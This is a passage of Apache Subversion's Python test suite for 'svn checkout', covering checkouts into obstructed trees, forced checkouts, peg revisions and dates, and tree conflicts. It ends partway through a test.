# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
# General modules
import sys, re, os, time, subprocess
import datetime
# Our testing module
import svntest
from svntest import wc, actions
import logging
# (abbreviation)
Skip = svntest.testcase.Skip_deco
SkipUnless = svntest.testcase.SkipUnless_deco
XFail = svntest.testcase.XFail_deco
Issues = svntest.testcase.Issues_deco
Issue = svntest.testcase.Issue_deco
Wimp = svntest.testcase.Wimp_deco
Item = wc.StateItem
logger = logging.getLogger()
#----------------------------------------------------------------------
# Helper function for testing stderr from co.
# If none of the strings in STDERR list matches the regular expression
# RE_STRING raise an error.
def test_stderr(re_string, stderr):
exp_err_re = re.compile(re_string)
for line in stderr:
if exp_err_re.search(line):
return
for x in stderr:
logger.debug(x[:-1])
logger.info("Expected stderr reg-ex: '" + re_string + "'")
raise svntest.Failure("Checkout failed but not in the expected way")
#----------------------------------------------------------------------
# Helper function to set up an existing local tree that has paths which
# obstruct with the incoming WC.
#
# Build a sandbox SBOX without a WC. Created the following paths
# rooted at SBOX.WC_DIR:
#
# iota
# A/
# A/mu
#
# If MOD_FILES is FALSE, 'iota' and 'A/mu' have the same contents as the
# standard greek tree. If TRUE the contents of each as set as follows:
#
# iota : contents == "This is the local version of the file 'iota'.\n"
# A/mu : contents == "This is the local version of the file 'mu'.\n"
#
# If ADD_UNVERSIONED is TRUE, add the following files and directories,
# rooted in SBOX.WC_DIR, that don't exist in the standard greek tree:
#
# 'sigma'
# 'A/upsilon'
# 'A/Z/'
#
# Return the expected output for svn co --force SBOX.REPO_URL SBOX.WC_DIR
#
def make_local_tree(sbox, mod_files=False, add_unversioned=False):
"""Make a local unversioned tree to checkout into."""
sbox.build(create_wc = False)
if os.path.exists(sbox.wc_dir):
svntest.main.safe_rmtree(sbox.wc_dir)
export_target = sbox.wc_dir
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = sbox.wc_dir
expected_output.desc[""] = Item()
expected_output.tweak(contents=None, status="A ")
# Export an unversioned tree to sbox.wc_dir.
svntest.actions.run_and_verify_export(sbox.repo_url,
export_target,
expected_output,
svntest.main.greek_state.copy())
# Remove everything remaining except for 'iota', 'A/', and 'A/mu'.
svntest.main.safe_rmtree(os.path.join(sbox.wc_dir, "A", "B"))
svntest.main.safe_rmtree(os.path.join(sbox.wc_dir, "A", "C"))
svntest.main.safe_rmtree(os.path.join(sbox.wc_dir, "A", "D"))
# Should obstructions differ from the standard greek tree?
if mod_files:
iota_path = os.path.join(sbox.wc_dir, "iota")
mu_path = os.path.join(sbox.wc_dir, "A", "mu")
svntest.main.file_write(iota_path,
"This is the local version of the file 'iota'.\n")
svntest.main.file_write(mu_path,
"This is the local version of the file 'mu'.\n")
# Add some files that won't obstruct anything in standard greek tree?
if add_unversioned:
sigma_path = os.path.join(sbox.wc_dir, "sigma")
svntest.main.file_append(sigma_path, "unversioned sigma")
upsilon_path = os.path.join(sbox.wc_dir, "A", "upsilon")
svntest.main.file_append(upsilon_path, "unversioned upsilon")
Z_path = os.path.join(sbox.wc_dir, "A", "Z")
os.mkdir(Z_path)
return wc.State(sbox.wc_dir, {
"A" : Item(status='E '), # Obstruction
"A/B" : Item(status='A '),
"A/B/lambda" : Item(status='A '),
"A/B/E" : Item(status='A '),
"A/B/E/alpha" : Item(status='A '),
"A/B/E/beta" : Item(status='A '),
"A/B/F" : Item(status='A '),
"A/mu" : Item(status='E '), # Obstruction
"A/C" : Item(status='A '),
"A/D" : Item(status='A '),
"A/D/gamma" : Item(status='A '),
"A/D/G" : Item(status='A '),
"A/D/G/pi" : Item(status='A '),
"A/D/G/rho" : Item(status='A '),
"A/D/G/tau" : Item(status='A '),
"A/D/H" : Item(status='A '),
"A/D/H/chi" : Item(status='A '),
"A/D/H/omega" : Item(status='A '),
"A/D/H/psi" : Item(status='A '),
"iota" : Item(status='E '), # Obstruction
})
######################################################################
# Tests
#
# Each test must return on success or raise on failure.
#----------------------------------------------------------------------
def checkout_with_obstructions(sbox):
"""co with obstructions conflicts without --force"""
make_local_tree(sbox, False, False)
#svntest.factory.make(sbox,
# """# Checkout with unversioned obstructions lying around.
# svn co url wc_dir
# svn status""")
#svntest.factory.make(sbox,
# """# Now see to it that we can recover from the obstructions.
# rm -rf A iota
# svn up""")
#exit(0)
wc_dir = sbox.wc_dir
url = sbox.repo_url
# Checkout with unversioned obstructions causes tree conflicts.
# svn co url wc_dir
expected_output = svntest.wc.State(wc_dir, {
'iota' : Item(status=' ', treeconflict='C'),
'A' : Item(status=' ', treeconflict='C'),
# And the updates below the tree conflict
'A/D' : Item(status=' ', treeconflict='A'),
'A/D/gamma' : Item(status=' ', treeconflict='A'),
'A/D/G' : Item(status=' ', treeconflict='A'),
'A/D/G/rho' : Item(status=' ', treeconflict='A'),
'A/D/G/pi' : Item(status=' ', treeconflict='A'),
'A/D/G/tau' : Item(status=' ', treeconflict='A'),
'A/D/H' : Item(status=' ', treeconflict='A'),
'A/D/H/chi' : Item(status=' ', treeconflict='A'),
'A/D/H/omega' : Item(status=' ', treeconflict='A'),
'A/D/H/psi' : Item(status=' ', treeconflict='A'),
'A/B' : Item(status=' ', treeconflict='A'),
'A/B/E' : Item(status=' ', treeconflict='A'),
'A/B/E/beta' : Item(status=' ', treeconflict='A'),
'A/B/E/alpha' : Item(status=' ', treeconflict='A'),
'A/B/F' : Item(status=' ', treeconflict='A'),
'A/B/lambda' : Item(status=' ', treeconflict='A'),
'A/C' : Item(status=' ', treeconflict='A'),
'A/mu' : Item(status=' ', treeconflict='A'),
})
expected_disk = svntest.main.greek_state.copy()
expected_disk.remove('A/B', 'A/B/E', 'A/B/E/beta', 'A/B/E/alpha', 'A/B/F',
'A/B/lambda', 'A/D', 'A/D/G', 'A/D/G/rho', 'A/D/G/pi', 'A/D/G/tau',
'A/D/H', 'A/D/H/psi', 'A/D/H/omega', 'A/D/H/chi', 'A/D/gamma', 'A/C')
actions.run_and_verify_checkout(url, wc_dir, expected_output,
expected_disk)
# svn status
expected_status = actions.get_virginal_state(wc_dir, 1)
# A and iota are tree conflicted and obstructed
expected_status.tweak('A', 'iota', status='D ', wc_rev=1,
treeconflict='C')
expected_status.tweak('A/D', 'A/D/G', 'A/D/G/rho', 'A/D/G/pi', 'A/D/G/tau',
'A/D/H', 'A/D/H/chi', 'A/D/H/omega', 'A/D/H/psi', 'A/D/gamma', 'A/B',
'A/B/E', 'A/B/E/beta', 'A/B/E/alpha', 'A/B/F', 'A/B/lambda', 'A/C',
status='D ')
# A/mu exists on disk, but is deleted
expected_status.tweak('A/mu', status='D ')
actions.run_and_verify_unquiet_status(wc_dir, expected_status)
# Now see to it that we can recover from the obstructions.
# rm -rf A iota
svntest.main.safe_rmtree( os.path.join(wc_dir, 'A') )
os.remove( os.path.join(wc_dir, 'iota') )
svntest.main.run_svn(None, 'revert', '-R', os.path.join(wc_dir, 'A'),
os.path.join(wc_dir, 'iota'))
# svn up
expected_output = svntest.wc.State(wc_dir, {
})
expected_disk = svntest.main.greek_state.copy()
expected_status = actions.get_virginal_state(wc_dir, 1)
actions.run_and_verify_update(wc_dir, expected_output, expected_disk,
expected_status,)
#----------------------------------------------------------------------
def forced_checkout_of_file_with_dir_obstructions(sbox):
"""forced co flags conflict if a dir obstructs a file"""
# svntest.factory.make(sbox,
# """mkdir $WC_DIR.other/iota
# svn co --force url $WC_DIR.other """)
sbox.build()
url = sbox.repo_url
wc_dir_other = sbox.add_wc_path('other')
other_iota = os.path.join(wc_dir_other, 'iota')
# mkdir $WC_DIR.other/iota
os.makedirs(other_iota)
# svn co --force url $WC_DIR.other
expected_output = svntest.wc.State(wc_dir_other, {
'A' : Item(status='A '),
'A/B' : Item(status='A '),
'A/B/E' : Item(status='A '),
'A/B/E/alpha' : Item(status='A '),
'A/B/E/beta' : Item(status='A '),
'A/B/F' : Item(status='A '),
'A/B/lambda' : Item(status='A '),
'A/D' : Item(status='A '),
'A/D/H' : Item(status='A '),
'A/D/H/chi' : Item(status='A '),
'A/D/H/omega' : Item(status='A '),
'A/D/H/psi' : Item(status='A '),
'A/D/G' : Item(status='A '),
'A/D/G/pi' : Item(status='A '),
'A/D/G/rho' : Item(status='A '),
'A/D/G/tau' : Item(status='A '),
'A/D/gamma' : Item(status='A '),
'A/C' : Item(status='A '),
'A/mu' : Item(status='A '),
'iota' : Item(status=' ', treeconflict='C'),
})
expected_disk = svntest.main.greek_state.copy()
expected_disk.tweak('iota', contents=None)
actions.run_and_verify_checkout(url, wc_dir_other, expected_output,
expected_disk, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_of_dir_with_file_obstructions(sbox):
"""forced co flags conflict if a file obstructs a dir"""
make_local_tree(sbox, False, False)
#svntest.factory.make(sbox,"""
# mkdir wc_dir_other
# echo "The file A" > wc_dir_other/A
# svn co --force url wc_dir_other
# """)
#svntest.factory.make(sbox,"""
# # Now see to it that we can recover from the obstructions.
# rm wc_dir_other/A
# svn up wc_dir_other""")
#exit(0)
url = sbox.repo_url
wc_dir_other = sbox.add_wc_path('other')
other_A = os.path.join(wc_dir_other, 'A')
# mkdir wc_dir_other
os.makedirs(wc_dir_other)
# echo "The file A" > wc_dir_other/A
svntest.main.file_write(other_A, 'The file A\n')
# svn co --force url wc_dir_other
expected_output = svntest.wc.State(wc_dir_other, {
'iota' : Item(status='A '),
'A' : Item(status=' ', treeconflict='C'),
# And what happens below A
'A/mu' : Item(status=' ', treeconflict='A'),
'A/D' : Item(status=' ', treeconflict='A'),
'A/D/G' : Item(status=' ', treeconflict='A'),
'A/D/G/tau' : Item(status=' ', treeconflict='A'),
'A/D/G/pi' : Item(status=' ', treeconflict='A'),
'A/D/G/rho' : Item(status=' ', treeconflict='A'),
'A/D/H' : Item(status=' ', treeconflict='A'),
'A/D/H/psi' : Item(status=' ', treeconflict='A'),
'A/D/H/omega' : Item(status=' ', treeconflict='A'),
'A/D/H/chi' : Item(status=' ', treeconflict='A'),
'A/D/gamma' : Item(status=' ', treeconflict='A'),
'A/C' : Item(status=' ', treeconflict='A'),
'A/B' : Item(status=' ', treeconflict='A'),
'A/B/E' : Item(status=' ', treeconflict='A'),
'A/B/E/beta' : Item(status=' ', treeconflict='A'),
'A/B/E/alpha' : Item(status=' ', treeconflict='A'),
'A/B/F' : Item(status=' ', treeconflict='A'),
'A/B/lambda' : Item(status=' ', treeconflict='A'),
})
expected_disk = svntest.main.greek_state.copy()
expected_disk.remove('A/B', 'A/B/E', 'A/B/E/beta', 'A/B/E/alpha', 'A/B/F',
'A/B/lambda', 'A/D', 'A/D/G', 'A/D/G/rho', 'A/D/G/pi', 'A/D/G/tau',
'A/D/H', 'A/D/H/psi', 'A/D/H/omega', 'A/D/H/chi', 'A/D/gamma', 'A/mu',
'A/C')
expected_disk.tweak('A', contents='The file A\n')
actions.run_and_verify_checkout(url, wc_dir_other, expected_output,
expected_disk, [], '--force')
# Now see to it that we can recover from the obstructions.
# rm wc_dir_other/A
os.remove(other_A)
# svn up wc_dir_other
expected_output = svntest.wc.State(wc_dir_other, {
})
expected_disk = svntest.main.greek_state.copy()
expected_status = actions.get_virginal_state(wc_dir_other, 1)
svntest.main.run_svn(None, 'revert', '-R', os.path.join(wc_dir_other, 'A'))
actions.run_and_verify_update(wc_dir_other, expected_output, expected_disk,
expected_status)
#----------------------------------------------------------------------
def forced_checkout_with_faux_obstructions(sbox):
"""co with faux obstructions ok with --force"""
# Make a local tree that partially obstructs the paths coming from the
# repos but has no true differences.
expected_output = make_local_tree(sbox, False, False)
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(sbox.repo_url,
sbox.wc_dir, expected_output,
expected_wc, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_with_real_obstructions(sbox):
"""co with real obstructions ok with --force"""
# Make a local tree that partially obstructs the paths coming from the
# repos and make the obstructing files different from the standard greek
# tree.
expected_output = make_local_tree(sbox, True, False)
expected_wc = svntest.main.greek_state.copy()
expected_wc.tweak('A/mu',
contents="This is the local version of the file 'mu'.\n")
expected_wc.tweak('iota',
contents="This is the local version of the file 'iota'.\n")
svntest.actions.run_and_verify_checkout(sbox.repo_url,
sbox.wc_dir, expected_output,
expected_wc, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_with_real_obstructions_and_unversioned_files(sbox):
"""co with real obstructions and unversioned files"""
# Make a local tree that partially obstructs the paths coming from the
# repos, make the obstructing files different from the standard greek
# tree, and finally add some files that don't exist in the stardard tree.
expected_output = make_local_tree(sbox, True, True)
expected_wc = svntest.main.greek_state.copy()
expected_wc.tweak('A/mu',
contents="This is the local version of the file 'mu'.\n")
expected_wc.tweak('iota',
contents="This is the local version of the file 'iota'.\n")
expected_wc.add({'sigma' : Item("unversioned sigma"),
'A/upsilon' : Item("unversioned upsilon"),
'A/Z' : Item(),
})
svntest.actions.run_and_verify_checkout(sbox.repo_url,
sbox.wc_dir, expected_output,
expected_wc, [], '--force')
#----------------------------------------------------------------------
def forced_checkout_with_versioned_obstruction(sbox):
"""forced co with versioned obstruction"""
# Make a greek tree working copy
sbox.build(read_only = True)
# Create a second repository with the same greek tree
repo_dir = sbox.repo_dir
repo_url = sbox.repo_url
other_repo_dir, other_repo_url = sbox.add_repo_path("other")
svntest.main.copy_repos(repo_dir, other_repo_dir, 1, 1)
fresh_wc_dir = sbox.add_wc_path('fresh')
fresh_wc_dir_A = os.path.join(fresh_wc_dir, 'A')
os.mkdir(fresh_wc_dir)
other_wc_dir = sbox.add_wc_path("other")
other_wc_dir_A = os.path.join(other_wc_dir, "A")
os.mkdir(other_wc_dir)
# Checkout "A" from the first repos to a fresh dir.
svntest.actions.run_and_verify_svn(svntest.verify.AnyOutput, [],
"co", repo_url + "/A",
fresh_wc_dir_A)
# Checkout "A" from the second repos to the other dir.
svntest.actions.run_and_verify_svn(svntest.verify.AnyOutput, [],
"co", other_repo_url + "/A",
other_wc_dir_A)
# Checkout the entire first repos into the fresh dir. This should
# fail because A is already checked out. (Ideally, we'd silently
# incorporate A's working copy into its parent working copy.)
expected_output = svntest.wc.State(fresh_wc_dir, {
'iota' : Item(status='A '),
'A' : Item(verb='Skipped'),
})
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(repo_url, fresh_wc_dir,
expected_output, expected_wc,
[], '--force')
# Checkout the entire first repos into the other dir. This should
# fail because it's a different repository.
expected_output = svntest.wc.State(other_wc_dir, {
'iota' : Item(status='A '),
'A' : Item(verb='Skipped'),
})
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(repo_url, other_wc_dir,
expected_output, expected_wc,
[], '--force')
#ensure that other_wc_dir_A is not affected by this forced checkout.
svntest.actions.run_and_verify_svn(None,
[], "st", other_wc_dir_A)
exit_code, sout, serr = svntest.actions.run_and_verify_svn(
None, [], "info",
other_wc_dir_A)
#TODO rename test_stderr to test_regex or something.
test_stderr("URL: " + other_repo_url + '/A$', sout)
#ensure that other_wc_dir is in a consistent state though it may be
#missing few items.
exit_code, sout, serr = svntest.actions.run_and_verify_svn(
None, [], "info",
other_wc_dir)
#TODO rename test_stderr to test_regex or something.
test_stderr("URL: " + sbox.repo_url + '$', sout)
#----------------------------------------------------------------------
# Ensure that an import followed by a checkout in place works correctly.
def import_and_checkout(sbox):
"""import and checkout"""
sbox.build(read_only = True)
other_repo_dir, other_repo_url = sbox.add_repo_path("other")
import_from_dir = sbox.add_wc_path("other")
# Export greek tree to import_from_dir
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = import_from_dir
expected_output.desc[''] = Item()
expected_output.tweak(contents=None, status='A ')
svntest.actions.run_and_verify_export(sbox.repo_url,
import_from_dir,
expected_output,
svntest.main.greek_state.copy())
# Create the 'other' repos
svntest.main.create_repos(other_repo_dir)
# Import import_from_dir to the other repos
expected_output = svntest.wc.State(sbox.wc_dir, {})
svntest.actions.run_and_verify_svn(None, [], 'import',
'-m', 'import', import_from_dir,
other_repo_url)
expected_output = wc.State(import_from_dir, {
"A" : Item(status='E '),
"A/B" : Item(status='E '),
"A/B/lambda" : Item(status='E '),
"A/B/E" : Item(status='E '),
"A/B/E/alpha" : Item(status='E '),
"A/B/E/beta" : Item(status='E '),
"A/B/F" : Item(status='E '),
"A/mu" : Item(status='E '),
"A/C" : Item(status='E '),
"A/D" : Item(status='E '),
"A/D/gamma" : Item(status='E '),
"A/D/G" : Item(status='E '),
"A/D/G/pi" : Item(status='E '),
"A/D/G/rho" : Item(status='E '),
"A/D/G/tau" : Item(status='E '),
"A/D/H" : Item(status='E '),
"A/D/H/chi" : Item(status='E '),
"A/D/H/omega" : Item(status='E '),
"A/D/H/psi" : Item(status='E '),
"iota" : Item(status='E ')
})
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(other_repo_url, import_from_dir,
expected_output, expected_wc,
[], '--force')
#----------------------------------------------------------------------
# Issue #2529.
@Issue(2529)
def checkout_broken_eol(sbox):
"checkout file with broken eol style"
svntest.actions.load_repo(sbox, os.path.join(os.path.dirname(sys.argv[0]),
'update_tests_data',
'checkout_broken_eol.dump'),
create_wc=False)
URL = sbox.repo_url
expected_output = svntest.wc.State(sbox.wc_dir, {
'file': Item(status='A '),
})
expected_wc = svntest.wc.State('', {
'file': Item(contents='line\nline2\n'),
})
svntest.actions.run_and_verify_checkout(URL,
sbox.wc_dir,
expected_output,
expected_wc)
def checkout_creates_intermediate_folders(sbox):
"checkout and create some intermediate folders"
sbox.build(create_wc = False, read_only = True)
checkout_target = os.path.join(sbox.wc_dir, 'a', 'b', 'c')
# checkout a working copy in a/b/c, should create these intermediate
# folders
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state
svntest.actions.run_and_verify_checkout(sbox.repo_url,
checkout_target,
expected_output,
expected_wc)
# Test that, if a peg revision is provided without an explicit revision,
# svn will checkout the directory as it was at rPEG, rather than at HEAD.
def checkout_peg_rev(sbox):
"checkout with peg revision"
sbox.build()
wc_dir = sbox.wc_dir
# create a new revision
mu_path = os.path.join(wc_dir, 'A', 'mu')
svntest.main.file_append(mu_path, 'appended mu text')
svntest.actions.run_and_verify_svn(None, [],
'ci', '-m', 'changed file mu', wc_dir)
# now checkout the repo@1 in another folder, this should create our initial
# wc without the change in mu.
checkout_target = sbox.add_wc_path('checkout')
os.mkdir(checkout_target)
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state.copy()
svntest.actions.run_and_verify_checkout(sbox.repo_url + '@1',
checkout_target,
expected_output,
expected_wc)
#----------------------------------------------------------------------
# Issue 2602: Test that peg revision dates are correctly supported.
@Issue(2602)
def checkout_peg_rev_date(sbox):
"checkout with peg revision date"
sbox.build()
wc_dir = sbox.wc_dir
## Get svn:date.
exit_code, output, errput = svntest.main.run_svn(None, 'propget', 'svn:date',
'--revprop', '-r1',
'--no-newline',
sbox.repo_url)
if exit_code or errput != [] or len(output) != 1:
raise svntest.Failure("svn:date propget failed")
r1_string = output[0]
## Increment the svn:date date by one microsecond.
# TODO: pass tzinfo=UTC to datetime.datetime()
date_pattern = re.compile(r'(\d+)-(\d+)-(\d+)T(\d\d):(\d\d):(\d\d)\.(\d+)Z$')
r1_time = datetime.datetime(*map(int, date_pattern.match(r1_string).groups()))
peg_time = r1_time + datetime.timedelta(microseconds=1)
assert r1_time != peg_time
# peg_string is, by all likelihood, younger than r1's svn:date and older than
# r2's svn:date. It is also not equal to either of them, so we test the
# binary search of svn:date values.
peg_string = '%04d-%02d-%02dT%02d:%02d:%02d.%06dZ' % \
tuple(getattr(peg_time, x)
for x in ["year", "month", "day", "hour", "minute",
"second", "microsecond"])
# create a new revision
mu_path = os.path.join(wc_dir, 'A', 'mu')
svntest.main.file_append(mu_path, 'appended mu text')
svntest.actions.run_and_verify_svn(None, [],
'ci', '-m', 'changed file mu', wc_dir)
# now checkout the repo@peg_string in another folder, this should create our
# initial wc without the change in mu.
checkout_target = sbox.add_wc_path('checkout')
os.mkdir(checkout_target)
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state.copy()
# use an old date to checkout, that way we're sure we get the first revision
svntest.actions.run_and_verify_checkout(sbox.repo_url +
'@{' + peg_string + '}',
checkout_target,
expected_output,
expected_wc)
# now try another checkout with repo@r1_string
checkout_target = sbox.add_wc_path('checkout2')
os.mkdir(checkout_target)
expected_output = svntest.main.greek_state.copy()
expected_output.wc_dir = checkout_target
expected_output.tweak(status='A ', contents=None)
expected_wc = svntest.main.greek_state.copy()
# use an old date to checkout, that way we're sure we get the first revision
svntest.actions.run_and_verify_checkout(sbox.repo_url +
'@{' + r1_string + '}',
checkout_target,
expected_output,
expected_wc)
#----------------------------------------------------------------------
def co_with_obstructing_local_adds(sbox):
"co handles obstructing paths scheduled for add"
sbox.build()
wc_dir = sbox.wc_dir
# Make a backup copy of the working copy
wc_backup = sbox.add_wc_path('backup')
svntest.actions.duplicate_dir(wc_dir, wc_backup)
# Add files and dirs to the repos via the first WC. Each of these
# will be added to the backup WC via a checkout:
#
# A/B/upsilon: Identical to the file scheduled for addition in
# the backup WC.
#
# A/C/nu: A "normal" add, won't exist in the backup WC.
#
# A/D/kappa: Conflicts with the file scheduled for addition in
# the backup WC.
#
# A/D/H/I: New dirs that will also be scheduled for addition
# A/D/H/I/J: in the backup WC.
# A/D/H/I/K:
#
# A/D/H/I/L: A "normal" dir add, won't exist in the backup WC.
#
# A/D/H/I/K/xi: Identical to the file scheduled for addition in
# the backup WC.
#
# A/D/H/I/K/eta: Conflicts with the file scheduled for addition in
# the backup WC.
upsilon_path = os.path.join(wc_dir, 'A', 'B', 'upsilon')
svntest.main.file_append(upsilon_path, "This is the file 'upsilon'\n")
nu_path = os.path.join(wc_dir, 'A', 'C', 'nu')
svntest.main.file_append(nu_path, "This is the file 'nu'\n")
kappa_path = os.path.join(wc_dir, 'A', 'D', 'kappa')
svntest.main.file_append(kappa_path, "This is REPOS file 'kappa'\n")
I_path = os.path.join(wc_dir, 'A', 'D', 'H', 'I')
os.mkdir(I_path)
J_path = os.path.join(I_path, 'J')
os.mkdir(J_path)
K_path = os.path.join(I_path, 'K')
os.mkdir(K_path)
L_path = os.path.join(I_path, 'L')
os.mkdir(L_path)
xi_path = os.path.join(K_path, 'xi')
svntest.main.file_append(xi_path, "This is file 'xi'\n")
eta_path = os.path.join(K_path, 'eta')
svntest.main.file_append(eta_path, "This is REPOS file 'eta'\n")
svntest.main.run_svn(None, 'add', upsilon_path, nu_path,
kappa_path, I_path)
# Created expected output tree for 'svn ci'
expected_output = wc.State(wc_dir, {
'A/B/upsilon' : Item(verb='Adding'),
'A/C/nu' : Item(verb='Adding'),
'A/D/kappa' : Item(verb='Adding'),
'A/D/H/I' : Item(verb='Adding'),
'A/D/H/I/J' : Item(verb='Adding'),
'A/D/H/I/K' : Item(verb='Adding'),
'A/D/H/I/K/xi' : Item(verb='Adding'),
'A/D/H/I/K/eta' : Item(verb='Adding'),
'A/D/H/I/L' : Item(verb='Adding'),
})
# Create expected status tree.
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.add({
'A/B/upsilon' : Item(status=' ', wc_rev=2),
'A/C/nu' : Item(status=' ', wc_rev=2),
'A/D/kappa' : Item(status=' ', wc_rev=2),
'A/D/H/I' : Item(status=' ', wc_rev=2),
'A/D/H/I/J' : Item(status=' ', wc_rev=2),
'A/D/H/I/K' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/xi' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/eta' : Item(status=' ', wc_rev=2),
'A/D/H/I/L' : Item(status=' ', wc_rev=2),
})
# Commit.
svntest.actions.run_and_verify_commit(wc_dir, expected_output,
expected_status)
# Create various paths scheduled for addition which will obstruct
# the adds coming from the repos.
upsilon_backup_path = os.path.join(wc_backup, 'A', 'B', 'upsilon')
svntest.main.file_append(upsilon_backup_path,
"This is the file 'upsilon'\n")
kappa_backup_path = os.path.join(wc_backup, 'A', 'D', 'kappa')
svntest.main.file_append(kappa_backup_path,
"This is WC file 'kappa'\n")
I_backup_path = os.path.join(wc_backup, 'A', 'D', 'H', 'I')
os.mkdir(I_backup_path)
J_backup_path = os.path.join(I_backup_path, 'J')
os.mkdir(J_backup_path)
K_backup_path = os.path.join(I_backup_path, 'K')
os.mkdir(K_backup_path)
xi_backup_path = os.path.join(K_backup_path, 'xi')
svntest.main.file_append(xi_backup_path, "This is file 'xi'\n")
eta_backup_path = os.path.join(K_backup_path, 'eta')
svntest.main.file_append(eta_backup_path, "This is WC file 'eta'\n")
svntest.main.run_svn(None, 'add',
upsilon_backup_path,
kappa_backup_path,
I_backup_path)
# Create expected output tree for a checkout of the wc_backup.
expected_output = wc.State(wc_backup, {
'A/B/upsilon' : Item(status='E '),
'A/C/nu' : Item(status='A '),
'A/D/H/I' : Item(status='E '),
'A/D/H/I/J' : Item(status='E '),
'A/D/H/I/K' : Item(status='E '),
'A/D/H/I/K/xi' : Item(status='E '),
'A/D/H/I/K/eta' : Item(status='C '),
'A/D/H/I/L' : Item(status='A '),
'A/D/kappa' : Item(status='C '),
})
# Create expected disk for checkout of wc_backup.
expected_disk = svntest.main.greek_state.copy()
expected_disk.add({
'A/B/upsilon' : Item("This is the file 'upsilon'\n"),
'A/C/nu' : Item("This is the file 'nu'\n"),
'A/D/H/I' : Item(),
'A/D/H/I/J' : Item(),
'A/D/H/I/K' : Item(),
'A/D/H/I/K/xi' : Item("This is file 'xi'\n"),
'A/D/H/I/K/eta' : Item("\n".join(["<<<<<<< .mine",
"This is WC file 'eta'",
"||||||| .r0",
"=======",
"This is REPOS file 'eta'",
">>>>>>> .r2",
""])),
'A/D/H/I/L' : Item(),
'A/D/kappa' : Item("\n".join(["<<<<<<< .mine",
"This is WC file 'kappa'",
"||||||| .r0",
"=======",
"This is REPOS file 'kappa'",
">>>>>>> .r2",
""])),
})
# Create expected status tree for the checkout. Since the obstructing
# kappa and upsilon differ from the repos, they should show as modified.
expected_status = svntest.actions.get_virginal_state(wc_backup, 2)
expected_status.add({
'A/B/upsilon' : Item(status=' ', wc_rev=2),
'A/C/nu' : Item(status=' ', wc_rev=2),
'A/D/H/I' : Item(status=' ', wc_rev=2),
'A/D/H/I/J' : Item(status=' ', wc_rev=2),
'A/D/H/I/K' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/xi' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/eta' : Item(status='C ', wc_rev=2),
'A/D/H/I/L' : Item(status=' ', wc_rev=2),
'A/D/kappa' : Item(status='C ', wc_rev=2),
})
# "Extra" files that we expect to result from the conflicts.
extra_files = ['eta\.r0', 'eta\.r2', 'eta\.mine',
'kappa\.r0', 'kappa\.r2', 'kappa\.mine']
# Perform the checkout and check the results in three ways.
# We use --force here because run_and_verify_checkout() will delete
# wc_backup before performing the checkout otherwise.
svntest.actions.run_and_verify_checkout(sbox.repo_url, wc_backup,
expected_output, expected_disk,
[], '--force',
extra_files=extra_files)
svntest.actions.run_and_verify_status(wc_backup, expected_status)
# Some obstructions are still not permitted:
#
# Test that file and dir obstructions scheduled for addition *with*
# history fail when checkout tries to add the same path.
# URL to URL copy of A/D/G to A/D/M.
G_URL = sbox.repo_url + '/A/D/G'
M_URL = sbox.repo_url + '/A/D/M'
svntest.actions.run_and_verify_svn(None, [],
'cp', G_URL, M_URL, '-m', '')
# WC to WC copy of A/D/H to A/D/M. (M is now scheduled for addition
# with history in WC and pending addition from the repos).
D_path = os.path.join(wc_dir, 'A', 'D')
H_path = os.path.join(wc_dir, 'A', 'D', 'H')
M_path = os.path.join(wc_dir, 'A', 'D', 'M')
svntest.actions.run_and_verify_svn(None, [],
'cp', H_path, M_path)
# URL to URL copy of A/B/E/alpha to A/B/F/omicron.
omega_URL = sbox.repo_url + '/A/B/E/alpha'
omicron_URL = sbox.repo_url + '/A/B/F/omicron'
svntest.actions.run_and_verify_svn(None, [],
'cp', omega_URL, omicron_URL,
'-m', '')
# WC to WC copy of A/D/H/chi to /A/B/F/omicron. (omicron is now
# scheduled for addition with history in WC and pending addition
# from the repos).
F_path = os.path.join(wc_dir, 'A', 'B', 'F')
omicron_path = os.path.join(wc_dir, 'A', 'B', 'F', 'omicron')
chi_path = os.path.join(wc_dir, 'A', 'D', 'H', 'chi')
svntest.actions.run_and_verify_svn(None, [],
'cp', chi_path,
omicron_path)
# Try to co M's Parent.
expected_status = svntest.actions.get_virginal_state(wc_dir, 1)
expected_status.add({
'A/B/F/omicron' : Item(status='A ', copied='+', wc_rev='-'),
'A/B/upsilon' : Item(status=' ', wc_rev=2),
'A/C/nu' : Item(status=' ', wc_rev=2),
'A/D/kappa' : Item(status=' ', wc_rev=2),
'A/D/H/I' : Item(status=' ', wc_rev=2),
'A/D/H/I/J' : Item(status=' ', wc_rev=2),
'A/D/H/I/K' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/xi' : Item(status=' ', wc_rev=2),
'A/D/H/I/K/eta' : Item(status=' ', wc_rev=2),
'A/D/H/I/L' : Item(status=' ', wc_rev=2),
'A/D/M' : Item(status='A ', copied='+', wc_rev='-'),
'A/D/M/psi' : Item(status=' ', copied='+', wc_rev='-'),
